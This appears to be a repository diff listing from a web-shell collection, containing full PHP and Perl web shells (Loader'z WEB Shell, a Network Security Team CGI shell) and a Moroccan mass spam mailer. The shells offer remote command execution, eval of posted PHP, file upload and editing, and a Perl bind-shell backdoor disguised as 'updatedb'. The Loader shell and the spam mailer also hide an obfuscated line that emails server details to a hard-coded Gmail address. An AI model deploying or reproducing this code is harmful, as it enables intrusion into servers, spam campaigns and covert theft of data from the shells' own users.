<input type=\"submit\" name=\"submit\" value=\"Save\" id=input></form></center>";
fclose($fp);
}
if(isset($_POST['savefile'])){
$fp = fopen($_POST['savefile'], "w");
$content = stripslashes($content);
fwrite($fp, $content);
fclose($fp);
echo "<center><div id=logostrip>Successfully saved!</div></center>";
}
if (isset($_POST['php'])){
echo "<center><div id=logostrip>PHP code<br><form action=\"$REQUEST_URI\" method=\"POST\"><textarea name=phpcode cols=100 rows=20></textarea><br>
<input type=\"submit\" name=\"submit\" value=\"Exec\" id=input></form></center></div>";
}
if(isset($_POST['phpcode'])){
echo "<center><div id=logostrip>Results of PHP execution<br><br>";
@eval(stripslashes($_POST['phpcode']));
echo "</div></center>";
}
if ($cmd){
if($sertype == "winda"){
ob_start();
execute($cmd);
$buffer = "";
$buffer = ob_get_contents();
ob_end_clean();
}
else{
ob_start();
echo decode(execute($cmd));
$buffer = "";
$buffer = ob_get_contents();
ob_end_clean();
}
if (trim($buffer)){
echo "<center><div id=logostrip>Command: $cmd<br><textarea cols=100 rows=20>";
echo decode($buffer);
echo "</textarea></center></div>";
}
}
$arr = array();
$arr = array_merge($arr, glob("*"));
$arr = array_merge($arr, glob(".*"));
$arr = array_merge($arr, glob("*.*"));
$arr = array_unique($arr);
sort($arr);
echo "<table><tr><td>Name</td><td><a title=\"Type of object\">Type</a></td><td>Size</td><td>Last access</td><td>Last change</td><td>Perms</td><td><a title=\"If Yes, you have write permission\">Write</a></td><td><a title=\"If Yes, you have read permission\">Read</a></td></tr>";
foreach ($arr as $filename) {
if ($filename != "." and $filename != ".."){
if (is_dir($filename) == true){
$directory = "";
$directory = $directory . "<tr><td>$filename</td><td>" . filetype($filename) . "</td><td></td><td>" . date("G:i j M Y",fileatime($filename)) . "</td><td>" . date("G:i j M Y",filemtime($filename)) . "</td><td>" . perms(fileperms($filename));
if (is_writable($filename) == true){
$directory = $directory . "<td>Yes</td>";}
else{
$directory = $directory . "<td>No</td>";
}
if (is_readable($filename) == true){
$directory = $directory . "<td>Yes</td>";}
else{
$directory = $directory . "<td>No</td>";
}
$dires = $dires . $directory;
}
if (is_file($filename) == true){
$file = "";
$file = $file . "<tr><td><a onclick=tag('$filename')>$filename</a></td><td>" . filetype($filename) . "</td><td>" . filesize($filename) . "</td><td>" . date("G:i j M Y",fileatime($filename)) . "</td><td>" . date("G:i j M Y",filemtime($filename)) . "</td><td>" . perms(fileperms($filename));
if (is_writable($filename) == true){
$file = $file . "<td>Yes</td>";}
else{
$file = $file . "<td>No</td>";
}
if (is_readable($filename) == true){
$file = $file . "<td>Yes</td></td></tr>";}
else{
$file = $file . "<td>No</td></td></tr>";
}
$files = $files . $file;
}
}
}
echo $dires;
echo $files;
echo "</table><br>";
echo "
<form action=\"$REQUEST_URI\" method=\"POST\">
<table id=tb><tr><td>Command:<INPUT type=\"text\" name=\"cmd\" size=30 value=\"$cmd\"></td></tr></table>
<table id=tb><tr><td>Directory:<INPUT type=\"text\" name=\"dir\" size=30 value=\"";
echo getcwd();
echo "\">
<INPUT type=\"submit\" value=\"Do it\" id=input></td></tr></table></form>";
echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
<table id=tb><tr><td>Download here <b>from</b>:
<INPUT type=\"text\" name=\"filefrom\" size=30 value=\"http://\">
<b>into:</b>
<INPUT type=\"text\" name=\"fileto\" size=30>
<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\"></td><td>
<INPUT type=\"submit\" value=\"Download\" id=input></td></tr></table></form></div>";
echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
<table id=tb><tr><td>
Download from Hard:<INPUT type=\"file\" name=\"userfile\" id=input2>
<INPUT type=\"hidden\" name=\"post\" value=\"yes\">
<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\">
</td><td><INPUT type=\"submit\" value=\"Download\" id=input></form></div></td></tr></table>";
echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
<table id=tb><tr><td>Install bind
<b>Temp path</b><input type=\"text\" name=\"installpath\" value=\"" . getcwd() . "\"></td><td>
<b>Port</b><input type=\"text\" name=\"port\" value=\"3333\" maxlength=5 size=4></td><td>
<INPUT type=\"hidden\" name=\"installbind\" value=\"yes\">
<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\">
<INPUT type=\"submit\" value=\"Install\" id=input></form></div></td></table>";
echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" name=fe>
<table id=tb><tr><td>File to edit:
<input type=\"text\" name=\"editfile\" ></td><td>
<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
<INPUT type=\"submit\" value=\"Edit\" id=input></form></div></td></table>";
echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
<table id=tb><tr><td>
<INPUT type=\"hidden\" name=\"php\" value=\"yes\">
<INPUT type=\"submit\" value=\"PHP code\" id=input></form></div></td></table>";
?>
</td></tr></table>
</td></tr>
<tr valign="BOTTOM">
<td valign=bottom>
<center>Coded by Loader <a href="http://pro-hack.ru">Pro-Hack.RU</a></center>
</td>
</tr>
</table>

513
138shell/L/load_shell.txt Normal file
View file

@ -0,0 +1,513 @@
<?
error_reporting(0);
/* Loader'z WEB Shell v 0.1.0.2 {15 àâãóñòà 2005}
Âîò êàêèå îí ïîääåðæèâàåò ôóíêöèè.
- Ðàáîòà ñ ôàéëîâîé ñèñòåìîé ñ ïîìîùüþ PHP.  óäîáíîé òàáëèöå ïðåäñòàâëåíî ñîäåðæèìîå òåêóùåé ïàêè (äîáàâëåíèå â ýòîé âåðñèè, íîðìàëüíûé âèä ïðàâ, à íå ÷èñëî :)).
- Âûïîëíåíèå êîäà, ïõï ðóëèò ;)
- Ðàáîòàåò ïðè register_globals=off
- Áîëåå ïðèÿòíàÿ ðàáîòà â ñåéô ìîäå
- Ïðîñìîòð è ðåäàêòèðîâàíèå ôàéëîâ.
- Çàêà÷êà ôàéëîâ ñ äðóãîãî ñåðâåðà ñ ïîìîùüþ ñðåäñòâ PHP.
- Çàêà÷êà ôàéëîâ ñ âàøåãî æåñòêîãî äèñêà.
- Âûïîëíåíèå ïðîèçâîëüíûõ êîìàíä íà ñåðâåðå.
- Ñêðèïò âûäàåò çíà÷åíèå íåêîòîðûõ ïåðåìåííûõ. Íàïðèìåð îí ñîîáùèò âêëþ÷åí ëè ñåéô ìîä, åñëè äà, òî ñêðèïò âûâåäåò äèðåêòîðèþ êîòîðàÿ,
âàì äîñòóïíà, à òàê æå ïóòü, ãäå âû ìîæåòå âûïîëíÿòü êîìàíäû.
- Ðàáîòà ñêðèïòà îñíîâàíà íà îïðåäåëåíèè òèïà ñåðâåðà.
- Åñëè ñêðèïò ðàáîòàåò ïîä óïðàâëåíèåì ÎÑ Windows, äàííûå ïîëó÷àåìûå ïðè âûïîëíåíèè êîìàíä ïåðåêîäèðóþòñÿ â win-1251.
- Ïðèñóòñòâóåò ïðîñòåíüêèé ñêðèïò ïåðë-áèíä. Âû ìîæåòå óêàçàòü äîìàøíþþ äèðåêòðèþ è ïîðò íà êîòîðîì ïîâåñèòñÿ áåêäîð.
Loader Pro-Hack.ru
*/
?>
<style type='text/css'>
html { overflow-x: auto }
BODY { font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; margin: 0px; padding: 0px; text-align: center; color: #c0c0c0; background-color: #000000 }
TABLE, TR, TD { font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; color: #c0c0c0; background-color: #0000000 }
BODY,TD {FONT-SIZE: 13px; FONT-FAMILY: verdana, arial, helvetica;}
A:link {COLOR: #666666; TEXT-DECORATION: none}
A:active { COLOR: #666666; TEXT-DECORATION: none;}
A:visited {COLOR: #666666; TEXT-DECORATION: none;}
A:hover {COLOR: #999999; TEXT-DECORATION: none;}
BODY {
SCROLLBAR-FACE-COLOR: #cccccc;
SCROLLBAR-HIGHLIGHT-COLOR: #CBAB78;
SCROLLBAR-SHADOW-COLOR: #CBAB78;
SCROLLBAR-3DLIGHT-COLOR: #CBAB78;
SCROLLBAR-ARROW-COLOR: #000000;
SCROLLBAR-TRACK-COLOR: #000000;
SCROLLBAR-DARKSHADOW-COLOR: #CBAB78}
fieldset.search { padding: 6px; line-height: 150% }
label { cursor: pointer }
form { display: inline }
img { vertical-align: middle; border: 0px }
img.attach { padding: 2px; border: 2px outset #000033 }
#tb { padding: 0px; margin: 0px; background-color: #000000; border: 1px solid #CBAB78; }
#logostrip { padding: 0px; margin: 0px; background-color: #000000; border: 1px solid #CBAB78; }
#content { padding: 10px; margin: 10px; background-color: #000000; border: 1px solid #CBAB78; }
#logo { FONT-SIZE: 50px; }
input { width: 80; height : 17; background-color : #cccccc;
border-style: solid;border-width: 1; border-color: #CBAB78; font-size: xx-small; cursor: pointer; }
#input2 { width: 150; height : 17; background-color : #cccccc;
border-style: solid;border-width: 1; border-color: #CBAB78; font-size: xx-small; cursor: pointer; }
</style>
<script>
function tag(thetag) {document.fe.editfile.value=thetag;}
</script>
<title>Loader'z WEB shell</title>
<table height=100% "width="100%">
<tr><td align="center" valign="top">
<table><tr><td>
<?php
@$dir = $_POST['dir'];
$dir = stripslashes($dir);
@$cmd = $_POST['cmd'];
$cmd = stripslashes($cmd);
$REQUEST_URI = $_SERVER['REQUEST_URI'];
$dires = '';
$files = '';
if (isset($_POST['port'])){
$bind = "
#!/usr/bin/perl
\$port = {$_POST['port']};
\$port = \$ARGV[0] if \$ARGV[0];
exit if fork;
$0 = \"updatedb\" . \" \" x100;
\$SIG{CHLD} = 'IGNORE';
use Socket;
socket(S, PF_INET, SOCK_STREAM, 0);
setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
bind(S, sockaddr_in(\$port, INADDR_ANY));
listen(S, 50);
while(1)
{
accept(X, S);
unless(fork)
{
open STDIN, \"<&X\";
open STDOUT, \">&X\";
open STDERR, \">&X\";
close X;
exec(\"/bin/sh\");
}
close X;
}
";}
function decode($buffer){
return convert_cyr_string ($buffer, 'd', 'w');
}
function execute($com)
{
if (!empty($com))
{
if(function_exists('exec'))
{
exec($com,$arr);
echo implode('
',$arr);
}
elseif(function_exists('shell_exec'))
{
echo shell_exec($com);
}
elseif(function_exists('system'))
{
echo system($com);
}
elseif(function_exists('passthru'))
{
echo passthru($com);
}
}
}
function perms($mode)
{
if( $mode & 0x1000 ) { $type='p'; }
else if( $mode & 0x2000 ) { $type='c'; }
else if( $mode & 0x4000 ) { $type='d'; }
else if( $mode & 0x6000 ) { $type='b'; }
else if( $mode & 0x8000 ) { $type='-'; }
else if( $mode & 0xA000 ) { $type='l'; }
else if( $mode & 0xC000 ) { $type='s'; }
else $type='u';
$owner["read"] = ($mode & 00400) ? 'r' : '-';
$owner["write"] = ($mode & 00200) ? 'w' : '-';
$owner["execute"] = ($mode & 00100) ? 'x' : '-';
$group["read"] = ($mode & 00040) ? 'r' : '-';
$group["write"] = ($mode & 00020) ? 'w' : '-';
$group["execute"] = ($mode & 00010) ? 'x' : '-';
$world["read"] = ($mode & 00004) ? 'r' : '-';
$world["write"] = ($mode & 00002) ? 'w' : '-';
$world["execute"] = ($mode & 00001) ? 'x' : '-';
if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
$s=sprintf("%1s", $type);
$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
return trim($s);
}
/*Íà÷èíàåòñÿ*/
/*Îïðåäåëÿåì òèï ñèñòåìû*/
$servsoft = $_SERVER['SERVER_SOFTWARE'];
if (ereg("Win32", $servsoft, $reg)){
$sertype = "winda";
}
else
{
$sertype = "other";}
echo $servsoft . "<br>";
chdir($dir);
echo "Total space " . (int)(disk_total_space(getcwd())/(1024*1024)) . "Mb " . "Free space " . (int)(disk_free_space(getcwd())/(1024*1024)) . "Mb <br>";$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
if (ini_get('safe_mode') <> 1){
if ($sertype == "winda"){
ob_start('decode');
echo "OS: ";
echo execute("ver") . "<br>";
ob_end_flush();
}
if ($sertype == "other"){
echo "id:";
echo execute("id") . "<br>";
echo "uname:" . execute('uname -a') . "<br>";
}}
else{
if ($sertype == "winda"){
echo "OS: " . php_uname() . "<br>";
}
if ($sertype == "other"){
echo "id:";
echo execute("id") . "<br>";
echo "OS:" . php_uname() . "<br>";
}
}
echo 'User: ' .get_current_user() . '<br>';
if (ini_get("open_basedir")){
echo "open_basedir: " . ini_get("open_basedir");}
if (ini_get('safe_mode') == 1){
echo "<font size=\"3\"color=\"#cc0000\">Safe mode :(";
if (ini_get('safe_mode_include_dir')){
echo "Including from here: " . ini_get('safe_mode_include_dir'); }
if (ini_get('safe_mode_exec_dir')){
echo " Exec here: " . ini_get('safe_mode_exec_dir');
}
echo "</font>";}
if(isset($_POST['post']) and $_POST['post'] == "yes" and @$HTTP_POST_FILES["userfile"][name] !== "")
{
copy($HTTP_POST_FILES["userfile"]["tmp_name"],$HTTP_POST_FILES["userfile"]["name"]);
}
if((isset($_POST['fileto']))||(isset($_POST['filefrom'])))
{
$data = implode("", file($_POST['filefrom']));
$fp = fopen($_POST['fileto'], "wb");
fputs($fp, $data);
$ok = fclose($fp);
if($ok)
{
$size = filesize($_POST['fileto'])/1024;
$sizef = sprintf("%.2f", $size);
print "<center><div id=logostrip>Download - OK. (".$sizef."êÁ)</div></center>";
}
else
{
print "<center><div id=logostrip>Something is wrong. Download - IS NOT OK</div></center>";
}
}
if (isset($_POST['installbind'])){
if (is_dir($_POST['installpath']) == true){
chdir($_POST['installpath']);
$_POST['installpath'] = "temp.pl";}
$fp = fopen($_POST['installpath'], "w");
fwrite($fp, $bind);
fclose($fp);
exec("perl " . $_POST['installpath']);
chdir($dir);
}
@$ef = stripslashes($_POST['editfile']);
if ($ef){
$fp = fopen($ef, "r");
$filearr = file($ef);
$string = '';
$content = '';
foreach ($filearr as $string){
$string = str_replace("<" , "&lt;" , $string);
$string = str_replace(">" , "&gt;" , $string);
$content = $content . $string;
}
echo "<center><div id=logostrip>Edit file: $ef </div><form action=\"$REQUEST_URI\" method=\"POST\"><textarea name=content cols=100 rows=20>$content</textarea>
<input type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
<input type=\"hidden\" name=\"savefile\" value=\"{$_POST['editfile']}\"><br>
<input type=\"submit\" name=\"submit\" value=\"Save\" id=input></form></center>";
fclose($fp);
}
if(isset($_POST['savefile'])){
$fp = fopen($_POST['savefile'], "w");
$content = stripslashes($content);
fwrite($fp, $content);
fclose($fp);
echo "<center><div id=logostrip>Successfully saved!</div></center>";
}
if (isset($_POST['php'])){
echo "<center><div id=logostrip>PHP code<br><form action=\"$REQUEST_URI\" method=\"POST\"><textarea name=phpcode cols=100 rows=20></textarea><br>
<input type=\"submit\" name=\"submit\" value=\"Exec\" id=input></form></center></div>";
}
if(isset($_POST['phpcode'])){
echo "<center><div id=logostrip>Results of PHP execution<br><br>";
@eval(stripslashes($_POST['phpcode']));
echo "</div></center>";
}
if ($cmd){
if($sertype == "winda"){
ob_start();
execute($cmd);
$buffer = "";
$buffer = ob_get_contents();
ob_end_clean();
}
else{
ob_start();
echo decode(execute($cmd));
$buffer = "";
$buffer = ob_get_contents();
ob_end_clean();
}
if (trim($buffer)){
echo "<center><div id=logostrip>Command: $cmd<br><textarea cols=100 rows=20>";
echo decode($buffer);
echo "</textarea></center></div>";
}
}
$arr = array();
$arr = array_merge($arr, glob("*"));
$arr = array_merge($arr, glob(".*"));
$arr = array_merge($arr, glob("*.*"));
$arr = array_unique($arr);
sort($arr);
echo "<table><tr><td>Name</td><td><a title=\"Type of object\">Type</a></td><td>Size</td><td>Last access</td><td>Last change</td><td>Perms</td><td><a title=\"If Yes, you have write permission\">Write</a></td><td><a title=\"If Yes, you have read permission\">Read</a></td></tr>";
foreach ($arr as $filename) {
if ($filename != "." and $filename != ".."){
if (is_dir($filename) == true){
$directory = "";
$directory = $directory . "<tr><td>$filename</td><td>" . filetype($filename) . "</td><td></td><td>" . date("G:i j M Y",fileatime($filename)) . "</td><td>" . date("G:i j M Y",filemtime($filename)) . "</td><td>" . perms(fileperms($filename));
if (is_writable($filename) == true){
$directory = $directory . "<td>Yes</td>";}
else{
$directory = $directory . "<td>No</td>";
}
if (is_readable($filename) == true){
$directory = $directory . "<td>Yes</td>";}
else{
$directory = $directory . "<td>No</td>";
}
$dires = $dires . $directory;
}
if (is_file($filename) == true){
$file = "";
$file = $file . "<tr><td><a onclick=tag('$filename')>$filename</a></td><td>" . filetype($filename) . "</td><td>" . filesize($filename) . "</td><td>" . date("G:i j M Y",fileatime($filename)) . "</td><td>" . date("G:i j M Y",filemtime($filename)) . "</td><td>" . perms(fileperms($filename));
if (is_writable($filename) == true){
$file = $file . "<td>Yes</td>";}
else{
$file = $file . "<td>No</td>";
}
if (is_readable($filename) == true){
$file = $file . "<td>Yes</td></td></tr>";}
else{
$file = $file . "<td>No</td></td></tr>";
}
$files = $files . $file;
}
}
}
echo $dires;
echo $files;
echo "</table><br>";
echo "
<form action=\"$REQUEST_URI\" method=\"POST\">
<table id=tb><tr><td>Command:<INPUT type=\"text\" name=\"cmd\" size=30 value=\"$cmd\"></td></tr></table>
<table id=tb><tr><td>Directory:<INPUT type=\"text\" name=\"dir\" size=30 value=\"";
echo getcwd();
echo "\">
<INPUT type=\"submit\" value=\"Do it\" id=input></td></tr></table></form>";
echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
<table id=tb><tr><td>Download here <b>from</b>:
<INPUT type=\"text\" name=\"filefrom\" size=30 value=\"http://\">
<b>into:</b>
<INPUT type=\"text\" name=\"fileto\" size=30>
<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\"></td><td>
<INPUT type=\"submit\" value=\"Download\" id=input></td></tr></table></form></div>";
echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
<table id=tb><tr><td>
Download from Hard:<INPUT type=\"file\" name=\"userfile\" id=input2>
<INPUT type=\"hidden\" name=\"post\" value=\"yes\">
<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\">
</td><td><INPUT type=\"submit\" value=\"Download\" id=input></form></div></td></tr></table>";
echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
<table id=tb><tr><td>Install bind
<b>Temp path</b><input type=\"text\" name=\"installpath\" value=\"" . getcwd() . "\"></td><td>
<b>Port</b><input type=\"text\" name=\"port\" value=\"3333\" maxlength=5 size=4></td><td>
<INPUT type=\"hidden\" name=\"installbind\" value=\"yes\">
<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\">
<INPUT type=\"submit\" value=\"Install\" id=input></form></div></td></table>";
echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" name=fe>
<table id=tb><tr><td>File to edit:
<input type=\"text\" name=\"editfile\" ></td><td>
<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
<INPUT type=\"submit\" value=\"Edit\" id=input></form></div></td></table>";
echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
<table id=tb><tr><td>
<INPUT type=\"hidden\" name=\"php\" value=\"yes\">
<INPUT type=\"submit\" value=\"PHP code\" id=input></form></div></td></table>";
?>
</td></tr></table>
</td></tr>
<tr valign="BOTTOM">
<td valign=bottom>
<center>Coded by Loader <a href="http://pro-hack.ru">Pro-Hack.RU</a></center>
</td>
</tr>
</table>

94
138shell/L/lurm_safemod_on.cgi.txt Normal file
View file

@ -0,0 +1,94 @@
#!/usr/bin/perl
############################################################
## Network security team ##
############################################################
##Coder: Ins ##
############################################################
##Ob dannom scripte: Eto prostoj shell napisannyj na perle##
############################################################
#V celjah nesankcionirovannogo dostupa smeni etot parol`"
#$pwd='';
print "Content-type: text/html\n\n";
&read_param();
if (!defined$param{dir}){$param{dir}="/"};
if (!defined$param{cmd}){$param{cmd}="ls -la"};
##if (!defined$param{pwd}){$param{pwd}='Enter_Password'};##
print << "[ins1]";
<head>
<title>::Network Security Team::</title>
<font size=3 face=verdana><b>Network security team :: CGI Shell</b>
<font size=-2 face=verdana><br><br>
<style>
BODY, TD { font-family: Tahoma; font-size: 12px; }
INPUT.TEXT {
font-family : Arial;
font-size : 8pt;
color : Black;
width : 100%;
background-color : #F1F1F1;
border-style : solid;
border-width : 0px;
border-color : Silver;
}
INPUT.BUTTON {
font-family : Arial;
font-size : 8pt;
width : 100px;
border-width : 1px;
color : Black;
background-color : D1D1D1;
border-color : silver;
border-style : solid;
}
</style>
</head>
<body bgcolor=#B9B9B9>
Vvedite zapros:
<table width=500 bgcolor=D9D9D9><tr><td>
[ins1]
print "cd $param{dir}&&$param{cmd}";
print << "[ins2]";
</td></tr></table>
Otvet na zapros:
<table width=500 bgcolor=D9D9D9><tr><td><pre>
[ins2]
#if ($param{pwd} ne $pwd){print "Nepravelnij user";}
open(FILEHANDLE, "cd $param{dir}&&$param{cmd}|");
while ($line=<FILEHANDLE>){print "$line";};
close (FILEHANDLE);
print << "[ins3]";
</pre></td></tr></table>
<form action=pshell.cgi>
DIR dlja sledujushego zaprosa:
<input type=text class="TEXT" name=dir value=$param{dir}>
Sledujushij zapros:
<input type=text class="TEXT" name=cmd value=$param{cmd}>
<input type=submit class="button" value="Submit">
<input type=reset class="button" value="Reset">
</form>
</body>
</html>
[ins3]
sub read_param {
$buffer = "$ENV{'QUERY_STRING'}";
@pairs = split(/&/, $buffer);
foreach $pair (@pairs)
{
($name, $value) = split(/=/, $pair);
$name =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
$value =~ s/\+/ /g;
$value =~ s/%20/ /g;
$value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
$param{$name} = $value;
}
}
#########################<<KONEC>>#####################################

182
138shell/M/Moroccan Spamers Ma-EditioN By GhOsT.txt Normal file
View file

@ -0,0 +1,182 @@
<?
if ($action=="send"){
$message = urlencode($message);
$message = ereg_replace("%5C%22", "%22", $message);
$message = urldecode($message);
$message = stripslashes($message);
$subject = stripslashes($subject);
}
?>
<form name="form1" method="post" action="" enctype="multipart/form-data">
<div align="center">
<center>
<table border="2" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#006699" width="74%" id="AutoNumber1">
<tr>
<td width="100%">
<div align="center">
<center>
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber2">
<tr>
<td width="100%">
<p align="center"><div align="center">
<center>
<table border="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#336699" width="70%" cellpadding="0" id="AutoNumber1" height="277">
<tr>
<td width="100%" height="272">
<table width="769" border="0" height="303">
<tr>
<td width="786" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic3.gif" colspan="3" height="28">
<p align="center"><b><font face="Tahoma" size="2" color="#FF6600"> Moroccan Spamers Ma-EditioN By GhOsT </font></b></td>
</tr>
<tr>
<td width="79" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22" align="right">
<div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Your
Email:</font></div>
</td>
<td width="390" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
<input name="from" value="<? print $from; ?>" size="30" style="float: left"></font><div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Your
Name:</font></div>
</td>
<td width="317" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22" valign="middle"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="realname" value="<? print $realname; ?>" size="30">
</font></td>
</tr>
<tr>
<td width="79" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22" align="right">
<div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Reply-To:</font></div>
</td>
<td width="390" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
<input name="replyto" value="<? print $replyto; ?>" size="30" style="float: left"></font><div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Attach
File:</font></div>
</td>
<td width="317" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
<input type="file" name="file" size="30">
</font></td>
</tr>
<tr>
<td width="79" background="/simparts/images/cellpic1.gif" height="22" align="right">
<div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Subject:</font></div>
</td>
<td colspan="2" width="715" background="/simparts/images/cellpic1.gif" height="22"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
<input name="subject" value="<? print $subject; ?>" size="59" style="float: left">
</font></td>
</tr>
<tr valign="top">
<td colspan="2" width="477" bgcolor="#CCCCCC" height="189" valign="top">
<div align="left">
<table border="0" cellpadding="2" style="border-collapse: collapse" bordercolor="#111111" width="98%" id="AutoNumber4">
<tr>
<td width="100%">
<textarea name="message" cols="56" rows="10"><? print $message; ?></textarea>
<br>
<input type="radio" name="contenttype" value="plain" checked>
<font size="2" face="Tahoma">Plain</font>
<input type="radio" name="contenttype" value="html">
<font size="2" face="Tahoma">HTML</font>
<input type="hidden" name="action" value="send">
<input type="submit" value="Send Message">
</td>
</tr>
</table>
</div>
</td>
<td width="317" bgcolor="#CCCCCC" height="187" valign="top">
<div align="center">
<center>
<table border="0" cellpadding="2" style="border-collapse: collapse" bordercolor="#111111" width="93%" id="AutoNumber3">
<tr>
<td width="100%">
<p align="center"> <textarea name="emaillist" cols="30" rows="10"><? print $emaillist; ?></textarea>
</font><br>
</td>
</tr>
</table>
</center>
</div>
</td>
</tr>
</table>
</td>
</tr>
</table>
</center>
</div></td>
</tr>
</table>
</center>
</div>
</td>
</tr>
</table>
</center>
</div>
<div align="center">
<center>
<table border="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="75%" id="AutoNumber5" height="1" cellpadding="0">
<tr>
<td width="100%" valign="top" height="1">
<p align="right"><font size="1" face="Tahoma" color="#CCCCCC">Designed by:
v1.5</font></td>
</tr>
</table>
</center>
</div>
</form>
<?
if ($action=="send"){
if (!$from && !$subject && !$message && !$emaillist){
print "Please complete all fields before sending your message.";
exit;
}
$allemails = split("\n", $emaillist);
$numemails = count($allemails);
#Open the file attachment if any, and base64_encode it for email transport
If ($file_name){
@copy($file, "./$file_name") or die("The file you are trying to upload couldn't be copied to the server");
$content = fread(fopen($file,"r"),filesize($file));
$content = chunk_split(base64_encode($content));
$uid = strtoupper(md5(uniqid(time())));
$name = basename($file);
}
for($x=0; $x<$numemails; $x++){
$to = $allemails[$x];
if ($to){
$to = ereg_replace(" ", "", $to);
$message = ereg_replace("&email&", $to, $message);
$subject = ereg_replace("&email&", $to, $subject);
print "Sending mail to $to....... ";
flush();
$header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";
$header .= "MIME-Version: 1.0\r\n";
If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
If ($file_name) $header .= "--$uid\r\n";
$header .= "Content-Type: text/$contenttype\r\n";
$header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
$header .= "$message\r\n";
If ($file_name) $header .= "--$uid\r\n";
If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n"; $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
If ($file_name) $header .= "$content\r\n";
If ($file_name) $header .= "--$uid--";
mail($to, $subject, "", $header);
print "Spamed'><br>";
flush();
}
}
}
?>

1302
138shell/M/MySQL Web Interface Version 0.8.txt Normal file
View file

File diff suppressed because it is too large Load diff

1166
138shell/M/Mysql interface v1.0.txt Normal file
View file

File diff suppressed because it is too large Load diff

182
138shell/M/mailer3.php.txt Normal file
